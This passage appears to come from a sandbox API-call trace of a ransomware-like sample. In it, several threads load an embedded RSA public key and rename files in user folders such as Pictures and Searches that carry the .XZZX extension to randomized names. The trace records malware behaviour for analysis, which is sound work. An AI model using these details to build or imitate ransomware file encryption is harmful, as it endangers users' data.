HALPmcxz\\Pictures\\D3D882303025B5406F9968D234469988.XZZX") returned 80 [0251.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0251.354] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\82F33E1C2C5AC432FDFCBF1A2F15A87A.XZZX") returned 80 [0251.354] StrStrW (lpFirst="D3D882303025B5406F9968D234469988.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1020 os_tid = 0x1300 [0251.509] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0251.509] lstrcpyW (in: lpString1=0x2baf460, lpString2="D59AAFC73FFFF3FE126A516D4420D846.XZZX" | out: lpString1="D59AAFC73FFFF3FE126A516D4420D846.XZZX") returned="D59AAFC73FFFF3FE126A516D4420D846.XZZX" [0251.509] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0251.509] SetErrorMode (uMode=0x1) returned 0x1 [0251.509] lstrcpyW (in: lpString1=0x2baf860, lpString2="D59AAFC73FFFF3FE126A516D4420D846.XZZX" | out: lpString1="D59AAFC73FFFF3FE126A516D4420D846.XZZX") returned="D59AAFC73FFFF3FE126A516D4420D846.XZZX" [0251.509] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xa4f421cf, Data2=0xb487, Data3=0x4e8c, Data4=([0]=0x91, [1]=0xea, [2]=0xca, [3]=0x81, [4]=0x79, [5]=0x6, [6]=0xcc, [7]=0x22))) returned 0x0 [0251.510] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\D59AAFC73FFFF3FE126A516D4420D846.XZZX") returned 80 [0251.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0251.510] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\A48360293763DBD4A4F421CF3A1EC01C.XZZX") returned 80 [0251.510] StrStrW (lpFirst="D59AAFC73FFFF3FE126A516D4420D846.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1021 os_tid = 0x1304 [0251.665] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0251.665] lstrcpyW (in: lpString1=0x2baf460, lpString2="D5D72CD040472A6053677EF544680EA8.XZZX" | out: lpString1="D5D72CD040472A6053677EF544680EA8.XZZX") returned="D5D72CD040472A6053677EF544680EA8.XZZX" [0251.665] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0251.665] SetErrorMode (uMode=0x1) returned 0x1 [0251.665] lstrcpyW (in: lpString1=0x2baf860, lpString2="D5D72CD040472A6053677EF544680EA8.XZZX" | out: lpString1="D5D72CD040472A6053677EF544680EA8.XZZX") returned="D5D72CD040472A6053677EF544680EA8.XZZX" [0251.665] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x3f9dde38, Data2=0xbb62, Data3=0x4c3f, Data4=([0]=0x86, [1]=0xa3, [2]=0x16, [3]=0xf8, [4]=0x9b, [5]=0xb1, [6]=0x3e, [7]=0x45))) returned 0x0 [0251.665] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\D5D72CD040472A6053677EF544680EA8.XZZX") returned 80 [0251.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0251.665] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ABC1F97037CF351E3F9DDE383A8A1966.XZZX") returned 80 [0251.666] StrStrW (lpFirst="D5D72CD040472A6053677EF544680EA8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1022 os_tid = 0x1308 [0251.822] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0251.822] lstrcpyW (in: lpString1=0x2baf460, lpString2="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX" | out: lpString1="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX") returned="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX" [0251.822] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0251.822] SetErrorMode (uMode=0x1) returned 0x1 [0251.822] lstrcpyW (in: lpString1=0x2baf860, lpString2="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX" | out: lpString1="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX") returned="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX" [0251.822] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xbb467a3d, Data2=0xa652, Data3=0x4768, Data4=([0]=0x90, [1]=0xbf, [2]=0xe6, [3]=0x89, [4]=0xd0, [5]=0xd2, [6]=0xd4, [7]=0xc4))) returned 0x0 [0251.822] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\F28BD0F0084D975830F3B58E0C6E7BA0.XZZX") returned 80 [0251.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0251.822] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AFD6B58A2E644F50BB467A3D311F3398.XZZX") returned 80 [0251.822] StrStrW (lpFirst="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1023 os_tid = 0x130c [0251.977] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0251.977] lstrcpyW (in: lpString1=0x2baf460, lpString2="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX" | out: lpString1="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX") returned="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX" [0251.978] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0251.978] SetErrorMode (uMode=0x1) returned 0x1 [0251.978] lstrcpyW (in: lpString1=0x2baf860, lpString2="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX" | out: lpString1="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX") returned="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX" [0251.978] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x54ac7df8, Data2=0x3cd4, Data3=0x44ab, Data4=([0]=0x95, [1]=0xe2, [2]=0xce, [3]=0x98, [4]=0xb3, [5]=0xfa, [6]=0xba, [7]=0x72))) returned 0x0 [0251.978] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX") returned 80 [0251.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0251.978] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8C5E71601050F19C54AC7DF8130BD5E4.XZZX") returned 80 [0251.978] StrStrW (lpFirst="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1024 os_tid = 0x1310 [0252.133] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0252.133] lstrcpyW (in: lpString1=0x2baf460, lpString2="FBB049370C08D85D799956BD1029BCA5.XZZX" | out: lpString1="FBB049370C08D85D799956BD1029BCA5.XZZX") returned="FBB049370C08D85D799956BD1029BCA5.XZZX" [0252.133] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0252.133] SetErrorMode (uMode=0x1) returned 0x1 [0252.133] lstrcpyW (in: lpString1=0x2baf860, lpString2="FBB049370C08D85D799956BD1029BCA5.XZZX" | out: lpString1="FBB049370C08D85D799956BD1029BCA5.XZZX") returned="FBB049370C08D85D799956BD1029BCA5.XZZX" [0252.133] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x1a176729, Data2=0x5aa, Data3=0x4076, Data4=([0]=0x96, [1]=0x23, [2]=0xd2, [3]=0x3b, [4]=0xfa, [5]=0xb4, [6]=0x50, [7]=0x1))) returned 0x0 [0252.133] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FBB049370C08D85D799956BD1029BCA5.XZZX") returned 80 [0252.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0252.133] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C88E4E3A016D1C5C1A176729042800A4.XZZX") returned 80 [0252.134] StrStrW (lpFirst="FBB049370C08D85D799956BD1029BCA5.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1025 os_tid = 0x1314 [0252.293] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0252.293] lstrcpyW (in: lpString1=0x2baf460, lpString2="C8D828EF44C6B909469A8E7948E79D51.XZZX" | out: lpString1="C8D828EF44C6B909469A8E7948E79D51.XZZX") returned="C8D828EF44C6B909469A8E7948E79D51.XZZX" [0252.293] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" [0252.293] SetErrorMode (uMode=0x1) returned 0x1 [0252.293] lstrcpyW (in: lpString1=0x2baf860, lpString2="C8D828EF44C6B909469A8E7948E79D51.XZZX" | out: lpString1="C8D828EF44C6B909469A8E7948E79D51.XZZX") returned="C8D828EF44C6B909469A8E7948E79D51.XZZX" [0252.293] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x2ff91efc, Data2=0xee03, Data3=0x4b8c, Data4=([0]=0x91, [1]=0x66, [2]=0x5, [3]=0xc1, [4]=0xcc, [5]=0xe5, [6]=0x60, [7]=0x2e))) returned 0x0 [0252.293] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\C8D828EF44C6B909469A8E7948E79D51.XZZX") returned 83 [0252.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0252.293] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\2AB9A4F4463D0AA42FF91EFC48F7EEEC.XZZX") returned 83 [0252.293] StrStrW (lpFirst="C8D828EF44C6B909469A8E7948E79D51.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1026 os_tid = 0x1318 [0252.447] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0252.447] lstrcpyW (in: lpString1=0x2baf460, lpString2="07542892440C59CA51177AF248413E12.XZZX" | out: lpString1="07542892440C59CA51177AF248413E12.XZZX") returned="07542892440C59CA51177AF248413E12.XZZX" [0252.447] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0252.447] SetErrorMode (uMode=0x1) returned 0x1 [0252.447] lstrcpyW (in: lpString1=0x2baf860, lpString2="07542892440C59CA51177AF248413E12.XZZX" | out: lpString1="07542892440C59CA51177AF248413E12.XZZX") returned="07542892440C59CA51177AF248413E12.XZZX" [0252.447] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xde985076, Data2=0x6f14, Data3=0x4e7d, Data4=([0]=0xa0, [1]=0x30, [2]=0xac, [3]=0x60, [4]=0x30, [5]=0xe7, [6]=0xde, [7]=0xf2))) returned 0x0 [0252.447] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\07542892440C59CA51177AF248413E12.XZZX") returned 80 [0252.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0252.447] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\6EC97338220E54C4DE98507624C9390C.XZZX") returned 80 [0252.447] StrStrW (lpFirst="07542892440C59CA51177AF248413E12.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1027 os_tid = 0x131c [0252.601] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0252.601] lstrcpyW (in: lpString1=0x2baf460, lpString2="22BE9D582E5129D8AA7CE5BC32720E20.XZZX" | out: lpString1="22BE9D582E5129D8AA7CE5BC32720E20.XZZX") returned="22BE9D582E5129D8AA7CE5BC32720E20.XZZX" [0252.601] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0252.601] SetErrorMode (uMode=0x1) returned 0x1 [0252.601] lstrcpyW (in: lpString1=0x2baf860, lpString2="22BE9D582E5129D8AA7CE5BC32720E20.XZZX" | out: lpString1="22BE9D582E5129D8AA7CE5BC32720E20.XZZX") returned="22BE9D582E5129D8AA7CE5BC32720E20.XZZX" [0252.601] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xa8af9d28, Data2=0x235a, Data3=0x45e5, Data4=([0]=0xa4, [1]=0xf8, [2]=0x8e, [3]=0x61, [4]=0x4c, [5]=0xcf, [6]=0xb0, [7]=0xf6))) returned 0x0 [0252.601] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\22BE9D582E5129D8AA7CE5BC32720E20.XZZX") returned 80 [0252.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0252.601] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\5039B81009A6E182A8AF9D280C61C5CA.XZZX") returned 80 [0252.601] StrStrW (lpFirst="22BE9D582E5129D8AA7CE5BC32720E20.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1028 os_tid = 0x1320 [0252.757] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 